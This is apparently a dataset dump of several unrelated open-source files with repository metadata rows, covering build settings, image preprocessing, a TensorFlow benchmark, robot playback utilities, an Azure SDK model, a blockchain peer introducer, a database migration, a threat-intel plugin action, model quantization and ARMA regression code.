CPP = '/usr/bin/cpp'
CPPFLAGS_NODE = ['-D_GNU_SOURCE']
CPPPATH_NODE = '/usr/include/nodejs'
CPPPATH_ST = '-I%s'
CXX = ['/usr/bin/g++']
CXXDEFINES_ST = '-D%s'
CXXFLAGS = ['-g', '-Wall', '-O3']
CXXFLAGS_DEBUG = ['-g']
CXXFLAGS_NODE = ['-D_LARGEFILE_SOURCE', '-D_FILE_OFFSET_BITS=64']
CXXFLAGS_RELEASE = ['-O2']
CXXLNK_SRC_F = ''
CXXLNK_TGT_F = ['-o', '']
CXX_NAME = 'gcc'
CXX_SRC_F = ''
CXX_TGT_F = ['-c', '-o', '']
DEST_BINFMT = 'elf'
DEST_CPU = 'x86_64'
DEST_OS = 'linux'
FULLSTATIC_MARKER = '-static'
LIBDIR = '/home/bibhas/.node_libraries'
LIBPATH_HIREDIS = '../deps/hiredis'
LIBPATH_NODE = '/usr/lib'
LIBPATH_ST = '-L%s'
LIB_HIREDIS = 'hiredis'
LIB_ST = '-l%s'
LINKFLAGS_MACBUNDLE = ['-bundle', '-undefined', 'dynamic_lookup']
LINK_CXX = ['/usr/bin/g++']
NODE_PATH = '/home/bibhas/.node_libraries'
PREFIX = '/usr/local'
PREFIX_NODE = '/usr'
RANLIB = '/usr/bin/ranlib'
RPATH_ST = '-Wl,-rpath,%s'
SHLIB_MARKER = '-Wl,-Bdynamic'
SONAME_ST = '-Wl,-h,%s'
STATICLIBPATH_ST = '-L%s'
STATICLIB_MARKER = '-Wl,-Bstatic'
STATICLIB_ST = '-l%s'
macbundle_PATTERN = '%s.bundle'
program_PATTERN = '%s'
shlib_CXXFLAGS = ['-fPIC', '-DPIC']
shlib_LINKFLAGS = ['-shared']
shlib_PATTERN = 'lib%s.so'
staticlib_LINKFLAGS = ['-Wl,-Bstatic']
staticlib_PATTERN = 'lib%s.a'
| [
"[email protected]"
] | |
47c4dfc1e15fb0f15d11f9e64213a4ad1ec7b299 | f4f19a0b856ba36100f67272b05dad90c76b7457 | /pre_processing/pre_process.py | d798aafcbd20c54aaac01bdeef281b7092d8d104 | [] | no_license | JamesBrace/kaggle | b9d8130aa1b5d17a2d89f3fa64b1142eb7167f7e | 2069a5a3afa236bf57b25526439b5d5950e4b136 | refs/heads/master | 2021-04-26T22:28:18.676810 | 2018-03-06T18:25:43 | 2018-03-06T18:25:43 | 124,097,839 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,993 | py | import numpy as np
from skimage.feature import canny
from scipy import ndimage as ndi
import matplotlib.pyplot as plt
from skimage import morphology
from skimage import util
class PreProcessedData:
def __init__(self):
self.x = []
self.y = []
self.cannied_images = []
self.filled_images = []
self.cleaned_images = []
self.processed_images = []
print("Getting and reshaping data")
self.get_and_reshape_data()
print("Pre-processing data")
self.pre_process()
def get_and_reshape_data(self):
self.x = np.loadtxt("../data/train_x.csv", delimiter=",") # load from text
self.y = np.loadtxt("../data/train_y.csv", delimiter=",")
self.x = self.x.reshape(-1, 64, 64) # reshape
self.y = self.y.reshape(-1, 1)
plt.imshow(self.x[0], cmap='gray')
plt.show()
def pre_process(self):
print("Canny-ing images")
self.canny_images()
print("Filling images")
self.fill_images()
print("Cleaning images")
self.clean_images()
def canny_images(self):
print(self.x[0])
print("Inverting images")
inverted_images = list(map(util.invert, self.x))
plt.imshow(inverted_images[0], cmap='gray')
plt.show()
print("Cannying inverted images")
self.cannied_images = list(map(canny, inverted_images))
# Done for test purposes
self.display_canny_image_example()
def display_canny_image_example(self):
plt.imshow(self.cannied_images[0], cmap='gray')
plt.show()
fig, ax = plt.subplots(figsize=(64, 64))
ax.imshow(self.cannied_images[0], cmap=plt.cm.gray, interpolation='nearest')
ax.set_title('Canny detector')
ax.axis('off')
ax.set_adjustable('box-forced')
plt.show()
def fill_images(self):
self.filled_images = list(map(ndi.binary_fill_holes, self.cannied_images))
self.cannied_images = []
# Done for test purposes
self.display_filled_image_example()
def display_filled_image_example(self):
plt.imshow(self.filled_images[0], cmap='gray')
plt.show()
fig, ax = plt.subplots(figsize=(64, 64))
ax.imshow(self.filled_images[0], cmap=plt.cm.gray, interpolation='nearest')
ax.set_title('filling the holes')
ax.axis('off')
plt.show()
def clean_images(self):
self.cleaned_images = morphology.remove_small_objects(self.filled_images, 21)
self.filled_images = []
self.display_clean_image_example()
def display_clean_image_example(self):
plt.imshow(self.cleaned_images[0], cmap='gray')
plt.show()
fig, ax = plt.subplots(figsize=(64, 64))
ax.imshow(self.cleaned_images[0], cmap=plt.cm.gray, interpolation='nearest')
ax.set_title('filling the holes')
ax.axis('off')
plt.show()
data = PreProcessedData()
| [
"[email protected]"
] | |
09360acd5784b7d43b7da742def5c650aacf37dc | 38a972a3cd1fc303b5f877e24d65118912d85d1c | /path/to/virtualenv/project/Lib/site-packages/tensorflow/python/ops/accumulate_n_benchmark.py | 9fb5b537c24e331fe9de5436d162df1024bcb89b | [] | no_license | ZulfikarAkbar/YOLO_ObjectDetection | 0c1015aa987d03329eae48a2053a07dda05d96c0 | 3517d0592a269f79df9afd82e0b1b0123bbe0473 | refs/heads/master | 2022-10-27T05:08:26.734173 | 2019-02-07T17:35:22 | 2019-02-07T17:35:22 | 169,613,306 | 0 | 1 | null | 2022-10-18T02:18:17 | 2019-02-07T17:35:03 | Python | UTF-8 | Python | false | false | 5,606 | py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Benchmark for accumulate_n() in math_ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import time
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import gen_control_flow_ops
from tensorflow.python.ops import gen_state_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.platform import test
class AccumulateNBenchmark(test.Benchmark):
def _AccumulateNTemplate(self, inputs, init, shape, validate_shape):
var = gen_state_ops.temporary_variable(
shape=shape, dtype=inputs[0].dtype.base_dtype)
ref = state_ops.assign(var, init, validate_shape=validate_shape)
update_ops = [
state_ops.assign_add(
ref, tensor, use_locking=True).op for tensor in inputs
]
with ops.control_dependencies(update_ops):
return gen_state_ops.destroy_temporary_variable(ref, var_name=var.op.name)
def _AccumulateNInitializedWithFirst(self, inputs):
return self._AccumulateNTemplate(
inputs,
init=array_ops.zeros_like(inputs[0]),
shape=inputs[0].get_shape(),
validate_shape=True)
def _AccumulateNInitializedWithMerge(self, inputs):
return self._AccumulateNTemplate(
inputs,
init=array_ops.zeros_like(gen_control_flow_ops.merge(inputs)[0]),
shape=tensor_shape.vector(0),
validate_shape=False)
def _AccumulateNInitializedWithShape(self, inputs):
return self._AccumulateNTemplate(
inputs,
init=array_ops.zeros(
shape=inputs[0].get_shape(), dtype=inputs[0].dtype.base_dtype),
shape=inputs[0].get_shape(),
validate_shape=True)
def _GenerateUnorderedInputs(self, size, n):
inputs = [random_ops.random_uniform(shape=[size]) for _ in xrange(n)]
random.shuffle(inputs)
return inputs
def _GenerateReplicatedInputs(self, size, n):
return n * self._GenerateUnorderedInputs(size, 1)
def _GenerateOrderedInputs(self, size, n):
inputs = self._GenerateUnorderedInputs(size, 1)
queue = data_flow_ops.FIFOQueue(
capacity=1, dtypes=[inputs[0].dtype], shapes=[inputs[0].get_shape()])
for _ in xrange(n - 1):
op = queue.enqueue(inputs[-1])
with ops.control_dependencies([op]):
inputs.append(math_ops.tanh(1.0 + queue.dequeue()))
return inputs
def _GenerateReversedInputs(self, size, n):
inputs = self._GenerateOrderedInputs(size, n)
inputs.reverse()
return inputs
def _SetupAndRunBenchmark(self, graph, inputs, repeats, format_args):
with graph.as_default():
add_n = math_ops.add_n(inputs)
acc_n_first = self._AccumulateNInitializedWithFirst(inputs)
acc_n_merge = self._AccumulateNInitializedWithMerge(inputs)
acc_n_shape = self._AccumulateNInitializedWithShape(inputs)
test_ops = (("AddN", add_n.op),
("AccNFirst", acc_n_first.op),
("AccNMerge", acc_n_merge.op),
("AccNShape", acc_n_shape.op))
with session.Session(graph=graph):
for tag, op in test_ops:
for _ in xrange(100):
op.run() # Run for warm up.
start = time.time()
for _ in xrange(repeats):
op.run()
duration = time.time() - start
args = format_args + (tag, duration)
print(self._template.format(*args))
def _RunBenchmark(self, tag, input_fn, sizes, ninputs, repeats):
for size in sizes:
for ninput in ninputs:
graph = ops.Graph()
with graph.as_default():
inputs = input_fn(size, ninput)
format_args = (tag, size, ninput, repeats)
self._SetupAndRunBenchmark(graph, inputs, repeats, format_args)
def benchmarkAccumulateN(self):
self._template = "{:<15}" * 6
args = {
"sizes": (128, 128**2),
"ninputs": (1, 10, 100, 300),
"repeats": 100
}
benchmarks = (("Replicated", self._GenerateReplicatedInputs),
("Unordered", self._GenerateUnorderedInputs),
("Ordered", self._GenerateOrderedInputs),
("Reversed", self._GenerateReversedInputs))
print(self._template.format("", "Size", "#Inputs", "#Repeat", "Method",
"Duration"))
print("-" * 90)
for benchmark in benchmarks:
self._RunBenchmark(*benchmark, **args)
if __name__ == "__main__":
test.main()
| [
"[email protected]"
] | |
d68d032e544410088da51547b06a4ca3e587f2b2 | f78e7917536b5ce8630fcab47428254fe6814591 | /RIK_simulator/src/lbd_playback/bin/playbackUtils.py | 12677392f8e812bce5f673014702e0941273b105 | [] | no_license | xuezhizeng/hwang_robot_works | da507993dbfb278e6981304d988d44e263a8b981 | 211f6aede9e5929ca4d174e8d1c28b3b3082752c | refs/heads/master | 2020-03-07T14:31:44.041890 | 2017-09-05T15:25:23 | 2017-09-05T15:25:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,276 | py | import numpy as np
import IK.transformations as T
from usingRosBag_linear import *
from IK.tongsCenter import *
class PlaybackUtils:
def __init__(self, vars):
# Global variables
self.positionDisplacement = np.array([0,0,-0.22])
self.vars = vars
# self.positionDisplacement = np.array([0,0,-0.38])
self.tongsLength = 0.2286
self.gripperLength = 0.1524
def getNextDataColumn(self, time, parser, tongsTransform):
'''
:param time: the desired time to be found (in seconds)
:param parser: the bag parser that contains the data table
:param tongsTransform: tongs transform object to get center
:return: pos, quaternion, encoder, force values corresponding to the given time
'''
timeIdx = self.find_closest(parser.timeStampArray, time)
time = parser.resample_time_stamp[timeIdx]
pos = parser.vivePos_interpolated[timeIdx]
pos = self.transformPosition(pos)
quat = parser.viveQuat_interpolated[timeIdx]
encoder = parser.encoderarray_interpolated[timeIdx]
pos = tongsTransform.getCenterPosition(pos,quat,encoder)
return time, pos, quat, encoder
def find_closest(self,A, target):
#A must be sorted
idx = A.searchsorted(target)
idx = np.clip(idx, 1, len(A)-1)
left = A[idx-1]
right = A[idx]
idx -= target - left < right - target
return idx
def checkValidConfig(self,pos, quat):
'''
checks if the given position and orientation are reachable by the ur5 robot arm
:param pos:
:param quat:
:return:
'''
# stub
return True
def transformPosition(self, pos):
'''
rotates the position to the VREP and urscript version of global space
:param pos:
:return:
'''
# posRet = [pos[1],-pos[0],pos[2]]
posRet = pos
posRet = np.array(posRet)
posRet -= self.positionDisplacement
return posRet.tolist()
def transformQuat(self, quat):
'''
rotates the quaternion to the VREP and urscript version of global space
:param pos:
:return:
'''
quatMat = T.quaternion_matrix(quat)
retMat = np.zeros((4,4))
retMat[:,0] = quatMat[:,1]
retMat[:,1] = -quatMat[:,0]
retMat[:,2] = quatMat[:,2]
return T.quaternion_from_matrix(quatMat)
def getGripperValue(self):
'''
returns the gripper value (between 0 and 0.085) that corresponds to the encoder value in radians
:param enocder: encoder value in radians
:return:
'''
# 0 for open, 1 for close
flag = 0
pos = self.vars.eeGoalPos
quat = self.vars.eeGoalOr
encoder = self.vars.encoderValue
if encoder < 0.035 and flag == 0:
encoder = 0.0
flag = 1
elif encoder >= 0.035 and flag == 1:
encoder = 0.085
flag = 0
return encoder
'''
distance = self.vars.TongsTransform.getTongsDistance(pos,quat,encoder)
if distance < 0.0:
return 0.0
#if distance > 0.066675:
# return 0.085
u = distance / 0.34
return u*0.085
'''
################## DEPRECATED FUNCTIONS ##############################################
'''
# get the next position and orientation in the file
# note that the position and orientation don't have to be at the same time in the csv
# quaternion is [w,x,y,z]
def getNextHandConfig(filePtr):
DEPRECATED
get the next position and orientation in the file
note that the position and orientation don't have to be at the same time in the csv
quaternion is [w,x,y,z]
:param filePtr:
:return:
posRet = []
quatRet = []
timeRet = []
while posRet == [] or quatRet == []:
line = filePtr.readline()
if line == '':
return [posRet, quatRet, timeRet]
lineArr = line.split(',')
time = extractTime(lineArr[0])
if posRet == []:
posXs = lineArr[1]
posYs = lineArr[2]
posZs = lineArr[3]
if not posXs == '':
posRet = [float(posXs), float(posYs), float(posZs)]
if not posRet == [] and not quatRet == []:
timeRet = time
break
if quatRet == []:
quatWs = lineArr[4]
quatXs = lineArr[5]
quatYs = lineArr[6]
quatZs = lineArr[7]
if not quatWs == '':
quatRet = [float(quatWs),float(quatXs),float(quatYs),float(quatZs)]
if not posRet == [] and not quatRet == []:
timeRet = time
break
posRet = transformPosition(posRet)
quatRet = transformQuat(quatRet)
# posRet = transformToGripperPos(posRet,quatRet)
posRet = tc.getCenterPosition(posRet, quatRet, 0.5)
return [posRet, quatRet, timeRet]
'''
'''
def extractTime(timeLine):
takes in the time header from the bag file and extracts the time
:param timeLine:
:return:
timeArr = timeLine.split(':')
return float(timeArr[-1])
'''
| [
"[email protected]"
] | |
2793bf43cb383c357d70e567eeb97526b4f54f97 | ba0e07b34def26c37ee22b9dac1714867f001fa5 | /azure-mgmt-web/azure/mgmt/web/models/network_access_control_entry.py | c63dd1cc8d4c8aec142f71ba8f7c5dea394ffc61 | [
"MIT"
] | permissive | CharaD7/azure-sdk-for-python | b11a08ac7d24a22a808a18203072b4c7bd264dfa | 9fdf0aac0cec8a15a5bb2a0ea27dd331dbfa2f5c | refs/heads/master | 2023-05-12T12:34:26.172873 | 2016-10-26T21:35:20 | 2016-10-26T21:35:20 | 72,448,760 | 1 | 0 | MIT | 2023-05-04T17:15:01 | 2016-10-31T15:14:09 | Python | UTF-8 | Python | false | false | 1,424 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class NetworkAccessControlEntry(Model):
"""NetworkAccessControlEntry.
:param action: Possible values include: 'Permit', 'Deny'
:type action: str or :class:`AccessControlEntryAction
<azure.mgmt.web.models.AccessControlEntryAction>`
:param description:
:type description: str
:param order:
:type order: int
:param remote_subnet:
:type remote_subnet: str
"""
_attribute_map = {
'action': {'key': 'action', 'type': 'AccessControlEntryAction'},
'description': {'key': 'description', 'type': 'str'},
'order': {'key': 'order', 'type': 'int'},
'remote_subnet': {'key': 'remoteSubnet', 'type': 'str'},
}
def __init__(self, action=None, description=None, order=None, remote_subnet=None):
self.action = action
self.description = description
self.order = order
self.remote_subnet = remote_subnet
| [
"[email protected]"
] | |
8fcbfa32a3cb2aab4ae34e37e6ff4a569f55b5ae | 41c0cbfbe922f09df9c6a4237c06a28ef458761c | /1278 B hyper set .py | 293d5e43a6792d28080181b20ec02d965484ab1d | [] | no_license | adityachaudhary147/py-codes | 8d45bfe3d3b67e4e802a2c1e01199551ef226aaa | 6a8918b5c6fca19ff74cef0dcd676c04b28ee8c4 | refs/heads/master | 2023-04-12T09:52:09.622458 | 2021-05-17T07:44:29 | 2021-05-17T07:44:29 | 244,203,716 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 615 | py | #jai mata di#
import sys
sys.stdin = open('input.in', 'r')
sys.stdout = open('output.out', 'w')
#start the code from here
n,k2=map(int,input().split())
l=set()
for i in range(n):
e=input()
l.add(e)
r=set(l)
l=list(l)
an=0
for j in range(n-1):
for k in range(j+1,n):
we=[0]*k2
ty=0
while ty<k2:
if l[j][ty]==l[k][ty]:
we[ty]=l[j][ty]
else:
if l[j][ty]!='E' and l[k][ty]!='E':
we[ty]='E'
if l[j][ty]!='T' and l[k][ty]!='T':
we[ty]='T'
if l[j][ty]!='S' and l[k][ty]!='S':
we[ty]='S'
ty+=1
we=''.join(we)
# print(we)
if we in r:
an+=1
print(an//3)
| [
"[email protected]"
] | |
13e604425bfe67eacff60bf986160796280d1f75 | c9fe27dd429741f2fd6d567e0aa157871fa89bed | /fork/introducer/introducer_api.py | efb7a706c223b3bdead2640e2d913a38101611bd | [
"Apache-2.0"
] | permissive | Fork-Network/fork-blockchain | 858d3aefe359a3fff547cf4464f45216b3718fa3 | 4e7c55b5787376dabacc8049eac49c0bb0bfd855 | refs/heads/main | 2023-06-23T00:28:14.607265 | 2021-07-24T02:23:22 | 2021-07-24T02:23:22 | 388,574,519 | 7 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,919 | py | from typing import Callable, Optional
from fork.introducer.introducer import Introducer
from fork.protocols.introducer_protocol import RequestPeersIntroducer, RespondPeersIntroducer
from fork.protocols.protocol_message_types import ProtocolMessageTypes
from fork.server.outbound_message import Message, make_msg
from fork.server.ws_connection import WSForkConnection
from fork.types.peer_info import TimestampedPeerInfo
from fork.util.api_decorators import api_request, peer_required
from fork.util.ints import uint64
class IntroducerAPI:
introducer: Introducer
def __init__(self, introducer) -> None:
self.introducer = introducer
def _set_state_changed_callback(self, callback: Callable):
pass
@peer_required
@api_request
async def request_peers_introducer(
self,
request: RequestPeersIntroducer,
peer: WSForkConnection,
) -> Optional[Message]:
max_peers = self.introducer.max_peers_to_send
if self.introducer.server is None or self.introducer.server.introducer_peers is None:
return None
rawpeers = self.introducer.server.introducer_peers.get_peers(
max_peers * 5, True, self.introducer.recent_peer_threshold
)
peers = []
for r_peer in rawpeers:
if r_peer.vetted <= 0:
continue
if r_peer.host == peer.peer_host and r_peer.port == peer.peer_server_port:
continue
peer_without_timestamp = TimestampedPeerInfo(
r_peer.host,
r_peer.port,
uint64(0),
)
peers.append(peer_without_timestamp)
if len(peers) >= max_peers:
break
self.introducer.log.info(f"Sending vetted {peers}")
msg = make_msg(ProtocolMessageTypes.respond_peers_introducer, RespondPeersIntroducer(peers))
return msg
| [
"[email protected]"
] | |
fb384863ec5d9329a46985b438244bc624df9626 | c24212464eb84588edc7903a8905f2a881d578c4 | /migrations/versions/46e80c86a0fb_.py | 044aab1785b0ec919d392c0f49889f32428e6dcb | [] | no_license | the-akira/Flask-Library | c533dc2fd1ac2d3d9e2732e7c7bed5b8cc7ca4bd | 833e77660053b1e95975ccdf8bf41a035722975c | refs/heads/master | 2023-05-25T12:08:15.898134 | 2023-02-07T23:36:50 | 2023-02-07T23:36:50 | 205,951,022 | 5 | 2 | null | 2023-02-15T22:08:36 | 2019-09-02T23:26:50 | HTML | UTF-8 | Python | false | false | 1,041 | py | """empty message
Revision ID: 46e80c86a0fb
Revises: 5ef733a72780
Create Date: 2022-05-14 05:28:36.082684
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '46e80c86a0fb'
down_revision = '5ef733a72780'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('analysis', sa.Column('user_id', sa.Integer(), nullable=True))
op.create_foreign_key(None, 'analysis', 'user', ['user_id'], ['id'])
op.alter_column('book', 'image_book',
existing_type=sa.VARCHAR(length=20),
nullable=True)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.alter_column('book', 'image_book',
existing_type=sa.VARCHAR(length=20),
nullable=False)
op.drop_constraint(None, 'analysis', type_='foreignkey')
op.drop_column('analysis', 'user_id')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
0af7ed5c92a7008afe7dce8d65ae9ad39ac90809 | c9500ad778b8521aaa85cb7fe3239989efaa4799 | /plugins/greynoise/icon_greynoise/actions/get_tag_details/action.py | 891477fb89da35b5e6cce9779412d9d97fdeb6ce | [
"MIT"
] | permissive | rapid7/insightconnect-plugins | 5a6465e720f114d71b1a82fe14e42e94db104a0b | 718d15ca36c57231bb89df0aebc53d0210db400c | refs/heads/master | 2023-09-01T09:21:27.143980 | 2023-08-31T10:25:36 | 2023-08-31T10:25:36 | 190,435,635 | 61 | 60 | MIT | 2023-09-14T08:47:37 | 2019-06-05T17:05:12 | Python | UTF-8 | Python | false | false | 1,087 | py | import insightconnect_plugin_runtime
from .schema import GetTagDetailsInput, GetTagDetailsOutput, Input, Component
# Custom imports below
from icon_greynoise.util.util import GNRequestFailure
from greynoise.exceptions import RequestFailure
class GetTagDetails(insightconnect_plugin_runtime.Action):
def __init__(self):
super(self.__class__, self).__init__(
name="get_tag_details",
description=Component.DESCRIPTION,
input=GetTagDetailsInput(),
output=GetTagDetailsOutput(),
)
def run(self, params={}):
tag_name = params.get(Input.TAG_NAME).lower()
output = {}
try:
resp = self.connection.gn_client.metadata()
for tag in resp["metadata"]:
if tag["name"].lower() == tag_name:
output = tag
except RequestFailure as e:
raise GNRequestFailure(e.args[0], e.args[1])
if output:
return output
else:
return {"name": params.get(Input.TAG_NAME), "description": "Tag Not Found"}
| [
"[email protected]"
] | |
314851d86273e01bceb3c684924368522f40ba2e | 9a3b9de5eba5585cff302dde267920269ab338ae | /zeus/networks/quant.py | eea5ce5ab0b4276fa82f0bbd22fd4222941b3d2e | [
"MIT"
] | permissive | Jizhongpeng/xingtian | 835f5b8d997d5dcdd13a77ad10bc658704892b18 | a9bdde734f14111854ed666dfdc780d5fe5311b1 | refs/heads/master | 2023-01-09T13:07:41.498246 | 2020-11-10T01:24:42 | 2020-11-10T01:24:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,935 | py | # -*- coding: utf-8 -*-
# Copyright (C) 2020. Huawei Technologies Co., Ltd. All rights reserved.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the MIT License.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# MIT License for more details.
"""Quantized Convlution."""
import logging
import zeus
from zeus.modules.operators import ops, quant
from zeus.common import ClassFactory, ClassType
@ClassFactory.register(ClassType.SEARCH_SPACE)
class Quantizer(object):
"""Model Quantization class."""
def __init__(self, model, nbit_w_list=8, nbit_a_list=8, skip_1st_layer=True):
super().__init__()
self.idx = 0
self.nbit_w_list = nbit_w_list
self.nbit_a_list = nbit_a_list
self.skip_1st_layer = skip_1st_layer
self.model = model
def _next_nbit(self):
"""Get next nbit."""
if isinstance(self.nbit_w_list, list) and isinstance(self.nbit_a_list, list):
nbit_w, nbit_a = self.nbit_w_list[self.idx], self.nbit_a_list[self.idx]
self.idx += 1
else:
nbit_w, nbit_a = self.nbit_w_list, self.nbit_a_list
return nbit_w, nbit_a
def _quant_conv(self, model):
"""Quantize the convolutional layer."""
if not isinstance(model, ops.Conv2d):
return model
nbit_w, nbit_a = self._next_nbit()
quant_model = quant.QuantConv(model.in_channels, model.out_channels, model.kernel_size,
model.stride, model.padding, model.dilation, model.groups, model.bias)
quant_model.build(nbit_w=nbit_w, nbit_a=nbit_a)
if zeus.is_torch_backend():
if nbit_w == 8:
quant_model = ops.QuantizeConv2d(model.in_channels, model.out_channels, model.kernel_size,
model.stride, model.padding, model.dilation, model.groups,
quant_bit=nbit_w)
return quant_model
def __call__(self):
"""Quantize the entire model."""
if self.nbit_w_list is None or self.nbit_a_list is None:
logging.warning("nbit_w or nbit_a is None, model can not be quantified.")
return self.model
is_first_conv = True
for name, layer in list(self.model.named_modules()):
if not isinstance(layer, ops.Conv2d) and self.skip_1st_layer:
continue
if is_first_conv:
is_first_conv = False
continue
quant_conv = self._quant_conv(layer)
self.model.set_module(name, quant_conv)
return self.model
def custom_hooks(self):
"""Calculate flops and params."""
return quant.quant_custom_ops()
| [
"[email protected]"
] | |
2db06d443b7fadfd5bf1b848b96ecd5dfcfcd003 | 10d98fecb882d4c84595364f715f4e8b8309a66f | /linear_dynamical_systems/iterated_regression.py | 86e5d1169c94d3a0da489858d906ac228f583206 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | afcarl/google-research | 51c7b70d176c0d70a5ee31ea1d87590f3d6c6f42 | 320a49f768cea27200044c0d12f394aa6c795feb | refs/heads/master | 2021-12-02T18:36:03.760434 | 2021-09-30T20:59:01 | 2021-09-30T21:07:02 | 156,725,548 | 1 | 0 | Apache-2.0 | 2018-11-08T15:13:53 | 2018-11-08T15:13:52 | null | UTF-8 | Python | false | false | 5,392 | py | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Regularized iterated regression for estimating AR parameters in ARMA models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from statsmodels.regression.linear_model import OLS
from statsmodels.tools.tools import add_constant
from statsmodels.tsa.tsatools import lagmat
def fit_arparams_iter(outputs, inputs, p, q, r, l2_reg=0.0):
"""Iterative regression for estimating AR params in ARMAX(p, q, r) model.
The iterative AR regression process provides consistent estimates for the
AR parameters of an ARMAX(p, q, r) model after q iterative steps.
It first fits an ARMAX(p, 0, r) model with least squares regression, then
ARMAX(p, 1, r), and so on, ..., til ARMAX(p, q, r). At the i-th step, it
fits an ARMAX(p, i, r) model, according to estimated error terms from the
previous step.
For description of the iterative regression method, see Section 2 of
`Consistent Estimates of Autoregressive Parameters and Extended Sample
Autocorrelation Function for Stationary and Nonstationary ARMA Models` at
https://www.jstor.org/stable/2288340.
The implementation here is a generalization of the method mentioned in the
paper. We adapt the method for multidimensional outputs, exogenous inputs, nan
handling, and also add regularization on the MA parameters.
Args:
outputs: Array with the output values from the LDS, nans allowed.
inputs: Array with exogenous inputs values, nans allowed. Could be None.
p: AR order, i.e. max lag of the autoregressive part.
q: MA order, i.e. max lag of the error terms.
r: Max lag of the exogenous inputs.
l2_reg: L2 regularization coefficient, to be applied on MA coefficients.
Returns:
Fitted AR coefficients.
"""
if outputs.shape[1] > 1:
# If there are multiple output dimensions, fit autoregressive params on
# each dimension separately and average.
params_list = [
fit_arparams_iter(outputs[:, j:j+1], inputs, p, q, r, l2_reg=l2_reg) \
for j in xrange(outputs.shape[1])]
return np.mean(
np.concatenate([a.reshape(1, -1) for a in params_list]), axis=0)
# We include a constant term in regression.
k_const = 1
# Input dim. If inputs is None, then in_dim = 0.
in_dim = 0
if inputs is not None:
in_dim = inputs.shape[1]
# Lag the inputs to obtain [?, r], column j means series x_{t-j}.
# Use trim to drop rows with unknown values both at beginning and end.
lagged_in = np.concatenate(
[lagmat(inputs[:, i], maxlag=r, trim='both') for i in xrange(in_dim)],
axis=1)
# Since we trim in beginning, the offset is r.
lagged_in_offset = r
# Lag the series itself to p-th order.
lagged_out = lagmat(outputs, maxlag=p, trim='both')
lagged_out_offset = p
y = outputs
y_offset = 0
# Estimated residuals, initialized to 0.
res = np.zeros_like(outputs)
for i in xrange(q + 1):
# Lag the residuals to i-th order in i-th iteration.
lagged_res = lagmat(res, maxlag=i, trim='both')
lagged_res_offset = y_offset + i
# Compute offset in regression, since lagged_in, lagged_out, and lagged_res
# have different offsets. Align them.
if inputs is None:
y_offset = max(lagged_out_offset, lagged_res_offset)
else:
y_offset = max(lagged_out_offset, lagged_res_offset, lagged_in_offset)
y = outputs[y_offset:, :]
# Concatenate all variables in regression.
x = np.concatenate([
lagged_out[y_offset - lagged_out_offset:, :],
lagged_res[y_offset - lagged_res_offset:, :]
],
axis=1)
if inputs is not None:
x = np.concatenate([lagged_in[y_offset - lagged_in_offset:, :], x],
axis=1)
# Add constant term as the first variable.
x = add_constant(x, prepend=True)
if x.shape[1] < k_const + in_dim * r + p + i:
raise ValueError('Insufficient sequence length for model fitting.')
# Drop rows with nans.
arr = np.concatenate([y, x], axis=1)
arr = arr[~np.isnan(arr).any(axis=1)]
y_dropped_na = arr[:, 0:1]
x_dropped_na = arr[:, 1:]
# Only regularize the MA part.
alpha = np.concatenate(
[np.zeros(k_const + in_dim * r + p), l2_reg * np.ones(i)], axis=0)
# When L1_wt = 0, it's ridge regression.
olsfit = OLS(y_dropped_na, x_dropped_na).fit_regularized(
alpha=alpha, L1_wt=0.0)
# Update estimated residuals.
res = y - np.matmul(x, olsfit.params.reshape(-1, 1))
if len(olsfit.params) != k_const + in_dim * r + p + q:
raise ValueError('Expected param len %d, got %d.' %
(k_const + in_dim * r + p + q, len(olsfit.params)))
if q == 0:
return olsfit.params[-p:]
return olsfit.params[-(p + q):-q]
| [
"[email protected]"
] | |
59fc04f65d00227209003ea2836478c904403fdb | 34f365117eb1d846fa922c24f3fc650188ce9746 | /bin/bed2countString.py | a029e30899b4529ca74ab313a5ed6655280c54f6 | [
"MIT"
